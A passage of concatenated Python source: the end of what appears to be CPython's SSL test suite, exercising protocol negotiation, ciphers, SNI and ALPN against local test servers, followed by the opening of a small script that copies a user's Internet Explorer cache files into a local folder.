try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
send_meth(indata, *args)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
s.close()
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), "TLSv1")
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers("RC4")
server_context.set_ciphers("AES:RC4")
stats = server_params_test(client_context, server_context)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
self.assertIn("RC4", name.split("-"))
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
'dist\(\) and linux_distribution\(\) '
'functions are deprecated .*',
PendingDeprecationWarning,
)
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, REMOTE_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
tests.append(NetworkedBIOTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
cache_grab.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# grab cache file to user path
# used for game factory, grab cached files
# winxos 2014-02-22
import os,sys
import fnmatch
import getpass #get user name
import shutil #copy
from time import sleep
rootdir = os.path.join('C:/Users',getpass.getuser(),'AppData\Local\Microsoft\Windows\INetCache\IE')
def copy_file(file,newpath):
base_dir=os.path.join(sys.path[0],newpath)#get absolute path
if not os.path.exists(base_dir): #不存在就建立
os.mkdir(base_dir)
simplename,suffix=os.path.splitext(os.path.basename(file))
